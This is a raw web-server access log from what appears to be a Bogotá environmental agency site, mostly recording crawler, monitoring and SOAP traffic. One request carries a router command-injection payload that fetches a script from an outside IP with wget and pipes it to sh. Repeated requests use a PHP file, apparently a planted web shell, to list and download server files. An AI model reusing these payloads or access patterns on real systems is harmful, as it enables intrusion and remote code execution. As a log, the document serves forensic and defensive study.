201.245.192.253 - - [16/Jun/2024:06:48:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:06:48:28 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [16/Jun/2024:06:49:10 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200003%20del%2031%20de%20Enero%20de%202019.pdf HTTP/1.1" 304 -
47.128.96.204 - - [16/Jun/2024:06:49:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=CineforoCinemateca.flv&ft=img&white=1 HTTP/1.1" 200 245519
172.22.2.4 - - [16/Jun/2024:06:47:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:06:49:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:06:48:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:06:50:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:06:51:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:06:51:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
69.171.249.9 - - [16/Jun/2024:06:52:02 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
201.245.192.253 - - [16/Jun/2024:06:52:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:06:53:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:06:53:28 -0500] "HEAD / HTTP/1.1" 200 -
47.128.121.44 - - [16/Jun/2024:06:53:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2100.pdf&ft=img&white=1 HTTP/1.1" 200 20239
124.220.171.218 - - [16/Jun/2024:06:53:50 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [16/Jun/2024:06:54:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [16/Jun/2024:06:55:12 -0500] "GET /bla/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 200 165608
172.22.2.4 - - [16/Jun/2024:06:53:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.21 - - [16/Jun/2024:06:55:13 -0500] "GET /bla/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000001%20DEL%2011%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 200 298890
66.249.66.20 - - [16/Jun/2024:06:55:22 -0500] "GET /Publicaciones/2024EE61556.pdf HTTP/1.1" 404 227
201.245.192.253 - - [16/Jun/2024:06:55:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [16/Jun/2024:06:55:24 -0500] "GET /BLA/resoluciones/AUTOS%202023/3687.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:06:54:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:06:56:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:06:56:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
69.171.249.10 - - [16/Jun/2024:06:57:19 -0500] "GET /animales-recuperados-en-san-cristobal-y-ciudad-bolivar-son-atendidos-en-el-centro-de-flora-de-la-secretaria-de-ambiente.html HTTP/1.1" 200 1056
201.245.192.253 - - [16/Jun/2024:06:57:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.63.203 - - [16/Jun/2024:06:57:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3839.pdf&ft=img&white=1 HTTP/1.1" 200 20239
148.153.45.238 - - [16/Jun/2024:06:58:05 -0500] "GET /AYvL HTTP/1.1" 404 1018
148.153.45.238 - - [16/Jun/2024:06:58:05 -0500] "GET /KMuP HTTP/1.1" 404 1018
148.153.45.238 - - [16/Jun/2024:06:58:06 -0500] "GET /aab8 HTTP/1.1" 404 1018
148.153.45.238 - - [16/Jun/2024:06:58:06 -0500] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 1018
148.153.45.238 - - [16/Jun/2024:06:58:06 -0500] "GET /aab9 HTTP/1.1" 404 1018
148.153.45.238 - - [16/Jun/2024:06:58:06 -0500] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:06:58:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:06:58:28 -0500] "HEAD / HTTP/1.1" 200 -
173.252.79.9 - - [16/Jun/2024:06:58:58 -0500] "GET /images/25%20Incendio%20declaratoria.jpeg HTTP/1.1" 200 90327
201.245.192.253 - - [16/Jun/2024:06:59:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
69.171.249.9 - - [16/Jun/2024:07:00:09 -0500] "GET /resiliencia-al-cambio-climatico-la-gran-meta-del-distrito-y-la-secretaria-de-ambiente-en-el-plan-de-desarrollo.html HTTP/1.1" 200 1340
201.245.192.253 - - [16/Jun/2024:07:00:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:07:00:31 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [16/Jun/2024:06:59:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:01:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:01:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.110.1 - - [16/Jun/2024:07:01:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2805.pdf&ft=img&white=1 HTTP/1.1" 200 552719
172.22.2.4 - - [16/Jun/2024:07:00:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
201.245.192.253 - - [16/Jun/2024:07:02:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:03:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:03:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:04:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:05:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.109.6 - - [16/Jun/2024:07:05:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_EducadoresAmb.flv&ft=notepad&white=1 HTTP/1.1" 200 4669107
201.245.192.253 - - [16/Jun/2024:07:06:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:06:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [16/Jun/2024:07:05:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:07:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:07:06:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
66.249.66.20 - - [16/Jun/2024:07:07:44 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-148.pdf HTTP/1.1" 200 478709
52.167.144.210 - - [16/Jun/2024:07:07:49 -0500] "GET /semana-ambiental-2022-del-31-de-mayo-al-5-de-junio-se-celebrara-en-bogota.html HTTP/1.1" 200 799
172.22.2.4 - - [16/Jun/2024:07:07:53 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [16/Jun/2024:07:08:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=5941&usuario=&sector=&fecha=2010&resuelve= HTTP/1.1" 200 1053
172.22.2.4 - - [16/Jun/2024:07:08:17 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [16/Jun/2024:07:08:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=5941&usuario=&sector=&fecha=2010&resuelve= HTTP/1.1" 200 1053
181.61.210.41 - - [16/Jun/2024:07:08:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5941.pdf HTTP/1.1" 200 221760
201.245.192.253 - - [16/Jun/2024:07:08:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:08:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:09:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.46.177 - - [16/Jun/2024:07:10:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=category-template.php&ft=download&white=1 HTTP/1.1" 200 47631
201.245.192.253 - - [16/Jun/2024:07:10:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.181 - - [16/Jun/2024:07:10:56 -0500] "GET /BLA/resoluciones/AUTOS%202022/1851.pdf HTTP/1.1" 200 467436
201.245.192.253 - - [16/Jun/2024:07:11:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:11:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [16/Jun/2024:07:12:13 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:07:12:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:07:11:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:13:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:13:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:07:11:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.128.40.110 - - [16/Jun/2024:07:14:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4504.pdf&ft=img&white=1 HTTP/1.1" 200 392975
201.245.192.253 - - [16/Jun/2024:07:14:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:15:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [16/Jun/2024:07:15:45 -0500] "GET /BLA/resoluciones/AUTOS%202023/5169.pdf HTTP/1.1" 304 -
152.61.192.232 - - [16/Jun/2024:07:16:10 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?REQUEST=GetCapabilities&SERVICE=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [16/Jun/2024:07:16:12 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [16/Jun/2024:07:16:12 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [16/Jun/2024:07:16:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:16:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:16:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36381
201.245.192.253 - - [16/Jun/2024:07:16:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
201.245.192.253 - - [16/Jun/2024:07:17:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.191.127.212 - - [16/Jun/2024:07:17:35 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:07:18:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:18:28 -0500] "HEAD / HTTP/1.1" 200 -
47.128.21.60 - - [16/Jun/2024:07:18:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150902-1651-10000.txt&ft=download HTTP/1.1" 200 595
172.22.2.4 - - [16/Jun/2024:07:16:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:07:17:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:07:19:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:19:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
201.245.192.253 - - [16/Jun/2024:07:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [16/Jun/2024:07:20:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.76 - - [16/Jun/2024:07:20:27 -0500] "GET /Publicaciones/2024EE62932.pdf HTTP/1.1" 404 227
201.245.192.253 - - [16/Jun/2024:07:21:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:21:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:07:22:15 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:07:22:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.55.31 - - [16/Jun/2024:07:22:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin&f=import.php&ft=download HTTP/1.1" 200 5215
201.245.192.253 - - [16/Jun/2024:07:23:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:23:28 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [16/Jun/2024:07:24:00 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5864.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:07:22:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51133
172.22.2.4 - - [16/Jun/2024:07:24:17 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [16/Jun/2024:07:22:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:24:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [16/Jun/2024:07:24:49 -0500] "GET /bla/boletinlegal/Directivas/2011/Directiva%20No.%209%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 326687
66.249.66.21 - - [16/Jun/2024:07:24:50 -0500] "GET /bla/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
66.249.66.19 - - [16/Jun/2024:07:24:50 -0500] "GET /BLA/resoluciones/AUTOS%202023/0318.pdf HTTP/1.1" 200 379154
172.22.2.4 - - [16/Jun/2024:07:23:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
201.245.192.253 - - [16/Jun/2024:07:25:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:26:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:26:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
69.171.249.115 - - [16/Jun/2024:07:26:28 -0500] "GET /dia-internacional-de-la-tierra-cambio-de-habitos-para-su-proteccion-y-conservacion.html HTTP/1.1" 200 1014
69.171.249.3 - - [16/Jun/2024:07:26:28 -0500] "GET /dia-internacional-de-la-tierra-cambio-de-habitos-para-su-proteccion-y-conservacion.html HTTP/1.1" 200 1014
47.128.110.100 - - [16/Jun/2024:07:26:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cinstall&f=xamppserver.inc&ft=download HTTP/1.1" 200 149
201.245.192.253 - - [16/Jun/2024:07:26:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36381
201.245.192.253 - - [16/Jun/2024:07:26:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
201.245.192.253 - - [16/Jun/2024:07:27:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.76.76 - - [16/Jun/2024:07:27:27 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1//44kNIFTPMuPzOewDtzIXU9Y35w+tR/rXFiQXOpC+UpJa35QvuH21&y=U2FsdGVkX1/sVYlV8FLK+3FMH/5OlO+/4YUfUwTY1kiH0ong+7GUpklYIEEisjiI HTTP/1.1" 200 31
186.102.76.76 - - [16/Jun/2024:07:27:34 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/ZkMSHkD02EClnSkYC1xpcHzsHGEXjQR8kDG64Qi+sqer4OV1bqhX5&y=U2FsdGVkX18jd/ix9zdTVXO/blA2NxYlVauyn0LsFDGyCFEeKrapC45RNwC5jzxf HTTP/1.1" 200 30
186.102.76.76 - - [16/Jun/2024:07:27:34 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX188JWAWaVegObhYSYKcmJjbauvQNEqVeXtC+QynMOspmfMj6juvtxWT+OaKzEvbHhacpKSckKDcy8WcJkz3onHIauiJLgPv9Pc=&u=U2FsdGVkX19LmgG4J55gQy4aqVT/Ebap59xhpIu+oQA=&y=U2FsdGVkX18jd/ix9zdTVXO/blA2NxYlVauyn0LsFDGyCFEeKrapC45RNwC5jzxf HTTP/1.1" 200 97
186.102.76.76 - - [16/Jun/2024:07:27:35 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/OFRfu9Dx2DV+4lwou0S8N+gSM2EWCqd7kMFrjIGC1m893CMGA/zt2CmKkDYJ3Fstct6vDVPtuTMHWDxxvQklXkHu5tZueW+f0vkYyU/xjVcpkfyoVB78/3BVU9hFCY/eYXcLG5ltn9DERHfN/KiQRc+mbT1hLBPPh7JLWPITbqfoEco+mGvGA+RS3qmUBi/RCNWZF4aeKkuIf1CM9gpZthUP9m7J/eYsUdhRvInbTqeEp7mJ1X2kVeN1JxSaTDNkIRnOgD+GW8pNRiK6wZI8ZKmoYutoND07J+vvrIWZ3BqLk+C8SJ1UdB/AidTt+KwCG+vwns+NZ2PJ2L/NaCQZia88o/JRLxEi/Y1Pq6m5Dr3Iz8BBDu5BijgYw9Parm0sHVc1NTmBugeM8Ezz4g2osKgyHyAHXMsBdFitnd87Aa0buxXmPlc4URrmIwEVaCldlezXtiBGRRp+3jFqznSFc0BRNi2i9t4pVlpCluuqc5n50/i431+RY1gGCW+4FK2CzF7gAyxmpMaUNIOQ8BJmuwFE0qBvY3Y2tnVUUQvSs1WiQvHynC+mztvWQQcSAK6Awfy65xcqFBCFWvviIlOWwp8LKZkj5zvy7iTlZPP82IHAnYMRG8linngb/lb2k6pzN//lBTsCwTCRnfwWIA7Mn4G//iTIaDViRRIzzDsNutmvxBjJLgwgCx4g0wOXTPdskRBx3z8h2KQ/JRJ07JZQ3hlym8XboAFgCkarEGdXrjkvUbLTKyp4lBVYt2oQEd4sH4lmUylyDy0tj2/VhxmVfFgjpD4s1DWiZo0EKnFmbpkpV5x82cLhspKEHdUIBLJEYhfrnaFbPjuG25lmC2ep+5rKvd+ekEyALg71Ix/Q1mM/h50Hr86XLpmRle3+fX2eFDMt+mJBc3H0BFallzASd7Rc1ypkXSa9m/lC/yYhDcuiYYwBOMG6XMc8tK1bVg7/OX9fEvokL6INOBgnE1DOqaoOEoXD/AC7xY/tTPbIp9h6CJAWLHsGtV6ilJmnUHv5Q+94AR0pAKgRMotEDfGdL7x8lSkvUxAk3Z4deNa85tJwofyx4ys4ndk+oiGJvg4t6LVDbfUGqj8zquHaXVrX4fs3vUAD2z2KPQ2ZPs3EelZQSbnv7RShYoYL8lb7Zzl7OHChuypyZ2tMFJL+OSAc6wIT5TqwJU4RqiSi003LDNFyrzNUpvzLwjUqPcV53FhUznSWLkzh6H55hx0kOWTEH/JFCIC5mm75r6adElQGXm5TksAiV+6uBtvoLjzyGEOHh3PlSvhSEh0hKR4gEZpgyG9rkNRiEpxe5WTuttgyy+OIMV/UAiQYY8IGjKIxHahbVQFTNMjqSKytmG2suJJ25O5jl4ITi0UWURySizsEPPDKn1Wgr1ueqlcRFCA3qzGafnCckVnrp78LWCE903eFfcGJwNHVUlTbGR1Ap0NvNXNrpCDVx0gf9PGoTySNINdVScosZTgAc5uU5nthIA8vfSxkapsbXX9/E4o80lGUA0eCJOGWVRCh00LW2uxGy8CvQmsd9OhA/ERRME74lBPdRv4UjWeLqjaE7xQSBzT1nl7tTFs3iFk4syLfeLaAa9OkuVh873U5qIySn5KBsM1cPXyfaDLsNp1xbiJdQ7rUvw2BTfPzTeQEodRJ8ZkkalbNm8qdTFLY9CXDGpzvlOGnVZNJzu9y0lkFpO6Flrs+320NeMiNKmwyNwHgghNHdZ5lLU9nAAjpwpWhkQSx/N0o2whHLVcEk52A=&u=U2FsdGVkX19LmgG4J55gQy4aqVT/Ebap59xhpIu+oQA=&y=U2FsdGVkX18jd/ix9zdTVXO/blA2NxYlVauyn0LsFDGyCFEeKrapC45RNwC5jzxf HTTP/1.1" 200 3095
186.102.76.76 - - [16/Jun/2024:07:27:35 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18EuZ9QRVevJTOK5F8awOfpTyMKnr9I0ByaqcJJt2zk3d+vmEXdjQfXLY+sb2E/xrs9TDIPfzcjNZbZ9ztX5nF0gfooVe7/R5qCy6smkLz366N3872JLQLgQpSeSwL+Cx++e9+KEmzL9KSqbNzadZ0iY9NEZTUk/pAqnT53cx7e+28ZbQuSsoQ0sKl1ONKntWzUPrP2KrotwhAhJDbyay66xMsJXpQLB2/5nddeZkPHdpPM+rQvgzhGjRrVwfmLmg+I8FCB/SSyL2No4eiCiIwEUW9GXe6tujTC3h+5IK4IOHoWdv7gLhYA0cLMCSkbSKrQrk7+BxuoTeLIMhh40zovE5/xv02gD/SnXC/0gQLu8nI1NFz6e1sSQM5Ab66UjR/b9kufcIPOTgplKL5F5liZ0sFnlQWN4ebId/wv/zNRoizBMdBqDdbQ3SELSnJYkGn0Tw43edsNRMkg6C+rCyDYi6SKF8TH98zTf8Pl0KpqrGMEFj9NkiPbu3p4WoAW1bsCQ+uthiwEBQHBUw7F1zLU1eKgAbM/QUFcuwhJPvPGf0QqqKW3yyOs1VNHhpO/LwU5E9FXZWMfFl9LDkFD/N2wVL7pP3Xb93JF2K4wnZar1g+5/Y8qjUxdIP6uD5H7GnQKgCWV7JQhCfZuRi65I4Tx8x2DI4MmO6oDeb18CxAuAGDJLhEhzCy1d4lH2thsOVe36IORAl2lijweLYwoc5YvJbGm5ZjMSTq2UEQqKprAhc5gP8Eu1MB9&u=U2FsdGVkX19LmgG4J55gQy4aqVT/Ebap59xhpIu+oQA=&y=U2FsdGVkX18jd/ix9zdTVXO/blA2NxYlVauyn0LsFDGyCFEeKrapC45RNwC5jzxf HTTP/1.1" 200 208
186.102.76.76 - - [16/Jun/2024:07:27:35 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/ZkMSHkD02EClnSkYC1xpcHzsHGEXjQR8kDG64Qi+sqer4OV1bqhX5 HTTP/1.1" 200 30244
69.171.249.12 - - [16/Jun/2024:07:28:14 -0500] "GET /distrito-levanta-alerta-ambiental-fase-1-por-calidad-del-aire.html HTTP/1.1" 200 921
69.171.249.8 - - [16/Jun/2024:07:28:14 -0500] "GET /distrito-levanta-alerta-ambiental-fase-1-por-calidad-del-aire.html HTTP/1.1" 200 921
201.245.192.253 - - [16/Jun/2024:07:28:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:28:28 -0500] "HEAD / HTTP/1.1" 200 -
157.90.244.54 - - [16/Jun/2024:07:28:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [16/Jun/2024:07:28:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34200
201.245.192.253 - - [16/Jun/2024:07:29:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:29:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34349
172.22.2.4 - - [16/Jun/2024:07:28:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:30:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.76.76 - - [16/Jun/2024:07:30:36 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18huXzn1fVB7nGP8haLr56kCE9PQRRuCuyu+o40cNYf0Y/ccdWbEUdw&y=U2FsdGVkX1+8MJJSqr8JF69yIKDDHGVqBWeBlxI5SEj/qKISLIG1cbezLcudSDAK HTTP/1.1" 200 31
186.102.76.76 - - [16/Jun/2024:07:30:42 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18k61v7U1n+rxgcuBf8xzIozSIibH8z2ITf8zaSCbOtwUZBs1kYYqFf&y=U2FsdGVkX1/qg6KG4GGZmX6ZtS5dGSkLFF2UQd1df23XKra8GW9J6zpap6NS4yu8 HTTP/1.1" 200 30
186.102.76.76 - - [16/Jun/2024:07:30:42 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19EYK3MrDLr7NjR2/gB2ILmF/ImEaDWa6KirhavhHOe6TGyFoFpKyR2VX6K/bGqlxSJY/ESQo7rkJOeUXaa9LJgayyZgYRukBU=&u=U2FsdGVkX1+7tDhvdU6HAsRwMUS+MBnfAt+bPKcLNfI=&y=U2FsdGVkX1/qg6KG4GGZmX6ZtS5dGSkLFF2UQd1df23XKra8GW9J6zpap6NS4yu8 HTTP/1.1" 200 97
